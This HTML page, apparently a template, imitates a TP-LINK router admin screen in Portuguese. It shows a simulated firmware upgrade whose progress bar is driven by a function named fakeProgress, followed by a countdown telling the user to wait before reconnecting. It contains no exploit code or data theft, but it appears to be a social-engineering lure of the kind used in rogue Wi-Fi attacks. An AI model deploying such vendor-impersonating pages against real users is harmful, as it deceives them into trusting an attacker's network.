<!DOCTYPE html>

<html lang"en">

	<head>

		<title>Configuração de Roteador</title>

		<meta charset="utf-8">

		<meta name="viewport" content="width=device-width, initial-scale=1">

		<link rel="stylesheet" href="bootstrap.min.css">

		<script src="jquery.min.js"></script>

		<script src="bootstrap.min.js"></script>

		<!-- CSS -->

		<style type="text/css">



    /* Sticky footer styles

    -------------------------------------------------- */



    html,

    body {

          height: 100%;

          /* The html and body elements cannot have any padding or margin. */

        }



        /* Wrapper for page content to push down footer */

        #wrap {

          min-height: 100%;

          height: auto !important;

          height: 100%;

          /* Negative indent footer by it's height */

          margin: 0 auto -60px;

        }



        /* Set the fixed height of the footer here */

        #push,

        #footer {

          height: 60px;

        }

        #footer {

          background-color: #f5f5f5;

        }



        /* Lastly, apply responsive CSS fixes as necessary */

        @media (max-width: 767px) {

          #footer {

            margin-left: -20px;

            margin-right: -20px;

            padding-left: 20px;

            padding-right: 20px;

          }

        }

		</style>

	</head>

	<body>

	<!-- Start navigation bar --> <!-- To change the navigation bar color change background attribute -->

	<nav class="navbar navbar-inverse" style="background:RoyalBlue;margin-top:2em;">

		<div class="container-fluid">

			<div class="navbar-header">

				<button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#myNavbar">

					<span class="icon-bar"></span>

					<span class="icon-bar"></span>

					<span class="icon-bar"></span>

				</button> 

				<!-- <a class="navbar-brand"><img style="background:transparent" src="Your LOGO" alt="Logo"></a> -->

        </div> 

		<div class="collapse navbar-collapse" id="myNavbar">

			<ul class="nav navbar-nav">

				<li class="dropdown" data-toggle="modal" data-target="#update-only">

					<a class="dropdown-toggle" data-toggle="dropdown" href='#' style="color:white">Setup <span class="caret"></span></a>

						<ul class="dropdown-menu">

							<li>

								<a href="#">Basic Setup</a>

							</li>

							<li>

								<a href="#">DDNS</a>

							</li>

							<li>

								<a href="#">MAC Address Clone</a>

							</li>

							<li>

								<a href="#">Advanced Routing</a>

							</li>

						</ul>

				</li>

				<li class="dropdown" data-toggle="modal" data-target="#update-only">

					<a class="dropdown-toggle" data-toggle="dropdown" href="#" style="color:white">Wireless <span class="caret"></span></a>

						<ul class="dropdown-menu">

							<li>

								<a href="#">Configurações básicas do WiFi</a>

							</li>

							<li>

								<a href="#">Wireless Security</a>

							</li>

							<li>

								<a href="#">Wireless MAC Filter</a>

							</li>

							<li>

								<a href="#">Advanced Wireless Settings</a>

							</li>

						</ul>

				</li>

				<li class="dropdown" data-toggle="modal" data-target="#update-only">

					<a class="dropdown-toggle" data-toggle="dropdown" href="#" style="color:white">Segurança <span class=caret></span></a>

						<ul class="dropdown-menu">

							<li>

								<a href="#">Firewall</a>

							</li>

							<li>

								<a href="#">VPN</a>

							</li>

						</ul>

				</li>

				<li class="dropdown" data-toggle="modal" data-target="#update-only">

					<a class="dropdown-toggle" data-toggle="dropdown" href="#" style="color:white">Restrições de Acesso <span class="caret"></span></a>

						<ul class="dropdown-menu">

							<li>

								<a href="#">Internet Access</a>

							</li>

						</ul>

				</li>

				<li class="dropdown" data-toggle="modal" data-target="#update-only">

					<a class="dropdown-toggle" data-toggle="dropdown" href="#" style="color:white">Administração <span class="caret"></span></a>

						<ul class="dropdown-menu">

							<li>

								<a href="#">Management</a>

							</li>

							<li>

								<a href="#">Log</a>

							</li>

							<li>

								<a href="#">Diagnostics</a>

							</li>

							<li>

								<a href="#">Factory Defaults</a>

							</li>

							<li>

								<a href="#">Config Manegements</a>

							</li>

						</ul>

				</li>

				<li class="dropdown" data-toggle="modal" data-target="#update-only">

					<a class="dropdown-toggle" data-toggle="dropdown" href="#" style="color:white">Status <span class="caret"></span></a>

						<ul class="dropdown-menu">

							<li>

								<a href="#">Router</a>

							</li>

							<li>

								<a href="#">Local Network</a>

							</li>

							<li>

								<a href="#">Wireless</a>

							</li>

							<li>

								<a href=#>Advanced Routing</a>

							</li>

						</ul>

				</li>

			</ul>

		</div>

		</div>

	</nav>

<!-- End navigation bar -->
<!-- Start firt phase -->
			
	<div class="container">
		<div>
			<h2 class="text-center" style="color:CornflowerBlue">Upgrade de Firmware em Progresso</h2>
				<p class="lead">A atualização está sendo carregada no roteador. Não desconecte ou desligue o roteador durante a atualização.</p>
		</div>
		<!-- Start porgress bar -->
		<div id="instance" class="progress">
			<div class="progress-bar progress-bar-striped active" role="progressbar "aria-valuenow=0 aria-valuemin=0 aria-valuemax=100 style="width: 0%;">
				<span class="sr-only">0% Completo</span>
			</div>
		</div>
		<!-- End porgress bar -->
		<div id="push">
		</div>
	</div>
	<!-- End first phase -->
	<!-- Start second phase -->
	<div class="container show-on-done hidden">
		<div class="row content">
			<div class="col-sm">
				<div>
					<p class="lead">A atualização foi bem-sucedida e atualmente está sendo instalada. O roteador está sendo reinicializado e você perderá o acesso à Internet. Permita que o cronômetro expire antes de se conectar novamente ao roteador.</p>
				</div>
			</div>
			<!-- start of the countdown -->
			<div class="col-sm text-center">
				<div id="clockdiv">
					<div>
						<span class="minutes">
						</span>
						<div class="smalltext">Minutos</div>
					</div>
					<div>
						<span class="seconds">
						</span>
						<div class="smalltext">Segundos</div>
					</div>
				</div>
			</div>
			<!-- end of the countdown -->
		</div>
		<div id="push">
		</div>
	</div>
	<!-- End second phase -->
	<!-- Start footer -->
	<footer class="footer">
		<div class="container text-center">
			<p class="text-muted">TP-LINK© 2021, All Rights Reserved.</p>
		</div>
	</footer>
	<!-- End footer -->
	<!-- Start upgrade first message -->
	<div class="modal fade" id="upgrade-only" role="dialog">
		<div class="modal-dialog modal-sm">
			<div class="modal-content">
				<div class="modal-header">
					<button type="button" class="close" data-dismiss="modal">&times;</button>
					<h4 class="modal-title">Informaçãe</h4>
				</div>
				<div class="modal-body">
					<p>Por favor espere a atualização terminar.</p>
				</div>
				<div class="modal-footer">
					<button type="button" class="btn btn-default" data-dismiss="modal">Fechar</button>
				</div>
			</div>
		</div>
	</div>
	<!-- End upgrade first message -->
<script>

/*

  Increases the progress bar

*/

function fakeProgress(container, durationInMs, onDone) {

    var intervalInMS = 200;

    var doneDelay = intervalInMS * 2;

    var bar = container.find('.progress-bar');

    var srOnly = bar.find('.sr-only');

    var percent = 0;



    var interval = setInterval(function updateBar() {

        percent += 100 * (intervalInMS/durationInMs);

        bar.css({width: percent + '%'});

        bar['aria-valuenow'] = percent;

        srOnly.text(percent + '% Complete');



        if (percent >= 100) {

            clearInterval(interval);

            setTimeout(function() {

                if (typeof onDone === 'function') {

                    onDone();

                }

            }, doneDelay);

        }

    }, intervalInMS);

}



/*

  Used to show content after the progress bar is done

*/

function onDone() {

    $('.show-on-done').removeClass('hidden');



    var deadline = new Date(Date.parse(new Date()) + 5 * 60 * 1000);

    initializeClock('clockdiv', deadline);

}



/*

  Calculates the remaning time

*/

function getTimeRemaining(endtime) {

  var t = Date.parse(endtime) - Date.parse(new Date());

  var seconds = Math.floor((t / 1000) % 60);

  var minutes = Math.floor((t / 1000 / 60) % 60);



  return {

    'total': t,

    'minutes': minutes,

    'seconds': seconds

  };

}



/*

  Creates the clock related content

*/

function initializeClock(id, endtime) {

  var clock = document.getElementById(id);

  var minutesSpan = clock.querySelector('.minutes');

  var secondsSpan = clock.querySelector('.seconds');



  function updateClock() {

    var t = getTimeRemaining(endtime);





    minutesSpan.innerHTML = ('0' + t.minutes).slice(-2);

    secondsSpan.innerHTML = ('0' + t.seconds).slice(-2);



    if (t.total <= 0) {

      clearInterval(timeinterval);

    }

  }



  // updating the countdown

  updateClock();

  var timeinterval = setInterval(updateClock, 1000);

}



// speed of the progress bar in milliseconds

var duration = 100000;



// start the progress bar

fakeProgress($('#instance'), duration, onDone);



</script> </body> </html> 